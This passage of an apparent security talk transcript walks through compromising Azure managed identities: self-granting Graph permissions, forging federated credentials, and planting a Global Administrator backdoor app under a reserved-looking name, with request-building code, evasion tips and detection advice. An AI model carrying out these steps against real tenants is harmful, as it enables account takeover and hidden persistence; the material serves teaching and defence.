of that user-assigned managed identity. Now go back to this screen again. Here we go. Thank you. And we're going to set the managed identity's permissions. A managed identity can have permissions on Azure — you configure that through role-based access control — and it can have permissions on Entra, but those you need to set through the API, not via IAM. I've created a function for that. And paste. Nope. Ctrl+C. Come on. >> I think the only thing you're going to remember at the end of this session is the amount of fuckups that I made, right? >> Language. Oh, language. >> Requirement. >> Oh, okay. Two things. Language. >> Yes. >> And copy-paste mistakes.
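Granting an app role to a service principal — including to itself, as described here — is a single Microsoft Graph call. A sketch of the request, assuming hypothetical object IDs; the app-role GUID shown is the commonly published ID for the `Application.ReadWrite.All` application permission on Microsoft Graph, but verify it against the Graph service principal in your own tenant:

```python
GRAPH = "https://graph.microsoft.com/v1.0"

# Assumed app-role ID for Application.ReadWrite.All on Microsoft Graph.
APPLICATION_READWRITE_ALL = "1bfefb4e-e0b5-418b-a88f-73c46d2cc8e9"

def build_app_role_grant(principal_object_id: str,
                         graph_sp_object_id: str,
                         app_role_id: str):
    """URL + POST body that grants an app role to a service principal.
    When principal and target are the same object, the identity is
    granting the role to itself."""
    url = f"{GRAPH}/servicePrincipals/{principal_object_id}/appRoleAssignments"
    body = {
        "principalId": principal_object_id,  # who receives the role
        "resourceId": graph_sp_object_id,    # the Graph SP in this tenant
        "appRoleId": app_role_id,
    }
    return url, body

url, body = build_app_role_grant(
    "22222222-2222-2222-2222-222222222222",
    "33333333-3333-3333-3333-333333333333",
    APPLICATION_READWRITE_ALL)
```

The self-grant is exactly why `AppRoleAssignment.ReadWrite.All` on a compromisable identity is so dangerous.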

>> Here we go. Oh, here. Yeah. Okay. Here — paste it. So, we're going to assign Application.ReadWrite.All to the user-assigned managed identity. >> Yeah. Fine. >> It already has those permissions… let's do it again. >> Yeah, we might have added those permissions earlier. Yep. >> We've been demoing the entire morning to get this to work properly. >> And now we're going to do it again.

>> How much did you pay the demo god? >> Not enough. >> I don't know. All right. Here we go. Paste it, paste it. It's probably going to give the same error. Let's see. >> Yeah, same error. Okay, never mind — the permissions were already granted. Normally speaking, we would use the current permissions that it has to assign these permissions, because we can do that — we have access to everything now. >> Yeah. >> Yep. Go ahead. I think we're going into the blue teaming part from here. >> Yeah. >> Here we go. >> Take it away.

>> Okay. Cool. >> All right. So, I'll let you talk about this. >> Yeah. So, the AppRoleAssignment.ReadWrite.All permission that we just added — we've got 15… no, we've got 20 minutes, 5 minutes longer? No. Okay. [ __ ] Language. AppRoleAssignment.ReadWrite.All gives us the permission to add role assignments to other applications. So we can add permissions to other applications, and to our own application. If you see that permission somewhere, treat it as an indication of a critical vulnerability in the environment — take that into account. >> All right. Again, detections: the unauthorized addition of federated credentials to a managed identity. You can detect those if you

have the logs. It might be worth doing that, considering how easy it is to compromise a user-assigned managed identity. The detection is no rocket science, and it's also publicly available through, I think, >> kqlsearch.com. >> It's been uploaded there. Definitely worth considering, especially because the well-known file that he used was coming from a public storage account that was not inside the same tenant — it was inside another tenant, so there's no trust there whatsoever. It's very easy to add a federated credential and to compromise your user-assigned managed identity at this moment. In addition, a very valuable set of logs to ingest is the subscription-level Azure Activity logs.
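As a rough illustration of the detection idea: the write that adds a federated credential appears in the Activity log under a fixed ARM operation name, which a rule can match on. A toy filter over activity-log-shaped records — the field names follow the ARM schema, but the sample records are invented:

```python
# ARM operation emitted when a federated credential is written to a UAMI.
FIC_WRITE = ("Microsoft.ManagedIdentity/userAssignedIdentities"
             "/federatedIdentityCredentials/write")

def flag_fic_writes(activity_records):
    """Return activity-log records that added or changed federated
    credentials on a user-assigned managed identity."""
    return [r for r in activity_records
            if r.get("operationName", "").lower() == FIC_WRITE.lower()]

# Invented sample records for illustration.
sample = [
    {"operationName": FIC_WRITE, "caller": "legacy-app-sp"},
    {"operationName": "Microsoft.Compute/virtualMachines/read",
     "caller": "ops-user"},
]
hits = flag_fic_writes(sample)
```

In production this logic would live in a KQL analytics rule over the ingested AzureActivity table rather than in Python, but the matching condition is the same.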

Those show you all of the enumeration activity on resources within the subscription. And this is one of the most important things, I believe: when you have subscriptions with resources in them, being able to see enumeration of those resources and to detect it gives you the opportunity to step in and stop someone by implementing automation. This next one is a detection that was created to catch an interactive sign-in from a service principal from a new country. Normally speaking, interactive sign-ins from a service principal are something you by definition don't want to see. You can also detect

that and act on it — an interactive sign-in shouldn't happen; on a service principal it should normally always be non-interactive sign-ins. But we decided to add this one because, while doing the attacks, we're using a VPN, so we're by definition coming from a new country, and the detection triggers. Want to take this one? >> Yeah. So one of the things that we do is enumerate the permissions of service principals, which isn't normal behavior within an environment. So we've created a detection rule for that: if an identity which is not a user identity tries to enumerate the permissions of another identity which is also not human, we flag an alert. So basically you know somebody tried to log in

non-interactively and tried to get information about your environment. >> Yeah. >> In addition, it's also possible to detect which tools are being used. In this case there's a pattern that the BlackCat tool uses that's detectable — I believe in the sign-in logs. And many tools that you get from GitHub use, for example, user agents that say a certain thing or follow a certain pattern, and you can detect on that. However, as we all know, it's very easy to change that and then evade the detection, just like this. >> Yeah, we've got a function for that called set user agent: it will enumerate different user agents and just pick one.

>> Yeah. >> Or you can set your own. >> In this case we used the user agent "BlackCat", so it's very easy to detect. But he's already built in that function, so something like this goes undetected. All right — conditional access. Also very interesting. You can use conditional access policies — you're probably familiar with those — to restrict the country you're allowed to log in from, or the device you're allowed to log in from. The other thing you have is workload identities: conditional access based not on a device or a user, but on a service principal or an app registration. That all works great, except for managed identities.

So it's good for protecting app registrations, but you can't use it for user-assigned and system-assigned managed identities, because Microsoft believes you are only going to use those from within their own infrastructure. But as you can see, we've now got a bearer token and can log in from anywhere with a token of that identity. There we go. Again: applying Azure Policy allows you to limit federated credential assignments, and even allows you to limit who can assign federated credentials. I'd say put it in place and govern who is able to perform such actions. Yeah. It's the same slide. >> Yeah, not much about this. There are several screens. Let's skip this one.

There's a couple of screens — these are very useful things, but we'll skip them for now because of time. >> All right. Phase five. >> Yeah. So, we only had a little issue with setting the permissions on the identity. So, please pray with me again. Here we go. Clear the screen, clear the screen. Okay. So after we have set the— are we here? Yeah. Okay. Copy it again. I'm just going to quickly see if this is going to work. Didn't paste. Nope, didn't paste. There we go. We are going to authenticate again with the service principal, because previously we were logged in as the user-assigned managed identity using its token, but that

doesn't have permissions on the resource. So we need to get a new bearer token, because we've added those permissions. So we log in again with the service principal you saw previously, from that config file, to be able to set the new federated credential and get the data out of there. We paste it in here. Yep — we are logged in with the legacy application again. What we'll do now is go and fetch a new token using the storage account. Copy, and we're going to paste it in here. So that's now again in my token variable. And we're going to connect with that variable as the user-assigned managed identity

again, with the new permissions. It has the same display name, so hopefully it's going to work. So the next step we can take now — because with all those permissions added, Application.ReadWrite.All for example — is to create a new application within Entra. Um, that's not this one. Ctrl+C, clear. We're going to use the function add entra application, and I'm hoping this is going to work, given the permission-setting issue earlier. In this case, we're going to call it MSPIM. Okay — unauthorized. Something went wrong. Unfortunately, we're not going to fix it now; I will talk you through it. There is a blog article which

describes the full story, and that version actually works. I probably made some copy-paste mistakes in my playbook here, but that's okay. So, what were we doing? We were creating an app registration called MSPIM. Why MSPIM? Because everybody trusts it. If you try to create an application in Entra through the portal with a name like MSPIM, or one of the other internal ones, it will block you — it will say it's a reserved name. If you do it through the API, it's not blocked. The fun thing is that we'd then have an MSPIM application within Entra with Global Administrator permissions assigned. Nobody is going to throw that away, because they're all afraid that deleting the MSPIM application will break

something. Why Global Administrator? Because a Global Administrator is able to assign roles to other users and groups, which is also interesting. And what happens if you now log in with the MSPIM application ID and application secret and set permissions on a user or a group? The SOC will think: oh, that's all fine, MSPIM assigned these permissions. It all falls within the normal pattern of an application. And that's how you keep a foothold within an environment and are able to escalate your privileges. >> Yeah. So for the red teamers among us: if you ever want to go unnoticed, create an application via the API that has a supposedly reserved name.
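The portal-versus-API gap described here comes down to where the name check happens. A minimal sketch of the raw Graph request for creating an app registration with an arbitrary display name — that a reserved-looking name passes this call while the portal blocks it is the speakers' observation, reproduced here only as payload shape:

```python
GRAPH = "https://graph.microsoft.com/v1.0"

def build_create_application(display_name: str):
    """URL + minimal POST body for creating an app registration via the
    Graph applications endpoint. displayName is free-form text here;
    no reserved-name validation is part of this request body."""
    return f"{GRAPH}/applications", {"displayName": display_name}

url, body = build_create_application("MSPIM")
```

The response (not shown) contains the new application's object ID and appId, which the next step — adding credentials — needs.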

It's possible. So — and I don't think this is going to work either. Or we can just check it. Is this the right one? No, it's not. Okay. Unfortunately, we didn't make it within 45 minutes this time. So next time we'll do it in an hour, including troubleshooting. What do you reckon? >> Yeah, let's do that. Or try. >> Yeah. Also, about the permissions: you would create the MSPIM application, but you just get the application within Entra. The second thing you would do is add credentials — and adding credentials is actually the persistence, because you've created an application and now you've got credentials of your own. You can use them somewhere externally and always

log in. So if the user-assigned managed identity gets deleted, or the privileged app registration we found gets deleted, we still know we have a backdoor, which is the MSPIM one. >> Right. >> Yeah. Well, we could show the "game over" slides now, but we didn't make it — so it's not game over today. >> Well, it is for us. >> Normally speaking, all these steps that we've shown you can be put into a script and executed very fast. It only takes this long because we're doing it manually, which takes time and gives us room to mess up. But once you put it in a script, you add some timers in there so it waits for all of the stuff to propagate properly.
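The persistence step — adding your own credentials to the app — maps to the Graph `addPassword` action. A sketch with a hypothetical application object ID; the secret Entra mints in the response (not shown) is what survives later cleanup of the original access path:

```python
GRAPH = "https://graph.microsoft.com/v1.0"

def build_add_password(application_object_id: str,
                       label: str = "svc-rotation"):
    """URL + POST body asking Entra to mint a new client secret for an
    application. The innocuous-sounding label is part of the blending-in
    the speakers describe."""
    url = f"{GRAPH}/applications/{application_object_id}/addPassword"
    return url, {"passwordCredential": {"displayName": label}}

url, body = build_add_password("44444444-4444-4444-4444-444444444444")
```

Defensively, this is also the call to watch for: credential additions to existing applications are a classic persistence signal.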

Then the environment can be compromised within seconds. As long as you've done your reconnaissance first and identified the possibilities, all of this is scriptable, and then it's very easy for the environment to get compromised and for it to be game over. >> Yeah. Fun thing — you can say: well, we've got PIM enabled; that's why there's an MSPIM application in the first place. And PIM will send you an email once a role is assigned. True. But if you have PIM, the email takes about 5 minutes before it's delivered. Well, we've got a SIEM and a SOC, we've got Microsoft Sentinel, which is

awesome — we get all the alerts in there. Well, the ingestion delay on Log Analytics from Entra is between 5 and 15 minutes. So if anybody offensive is in here: you know you can do a lot with a Global Administrator within 5 to 15 minutes. >> Yeah. >> So you will be toast anyway. >> All right. Some of these detections I will skip. The main point I'm trying to make is that, natively speaking, many of the things we've done just now will go unnoticed if you don't add custom detections for them. Luckily, there's quite a big community that shares these things publicly — open-sourced through kqlsearch.com. You can visit it. There's a lot of stuff on

there. Um, and yeah, I think that's pretty much it. I'll skip through some of this. Also: when you add a Global Administrator, normally speaking you get an email automatically. It's very easy to detect Global Administrator assignments, so at the very least, please detect something like that. Even if it's legitimate behavior, it's important to know who your global admins are and at what time the permissions were granted. >> Yep. >> I'll skip this one too, and I'll skip the demo. Again, a familiar page: if you want a shot at the €1,000 of Azure credit, go to this website and try to breach it. You're able to become Global

Administrator if you can get that far. If you do, send him a message on LinkedIn. >> Yeah, you'll get a subscription within the environment with about a thousand euros of credit. I get about €13,000 per year from Microsoft, which is fun. So I decided to make something fun of this session: if we were not able to create a global admin account, you would all feel very bad and disappointed, so I thought, well, maybe I can make you happy by owning €1,000 in Azure credits within my subscription. There are some vulnerabilities in there — about 60, including a SQL injection. There's a full back end in there. So have fun. >> Yeah. One suggestion, as with every

website vulnerability challenge: start by inspecting the page. Before we go to questions, one last thing: if you want to use the BlackCat tooling, the QR code is on the screen — you can scan it now. And yeah, that's about it. If you want to look for us and find us, LinkedIn is on the page too. Yeah — thanks for your time.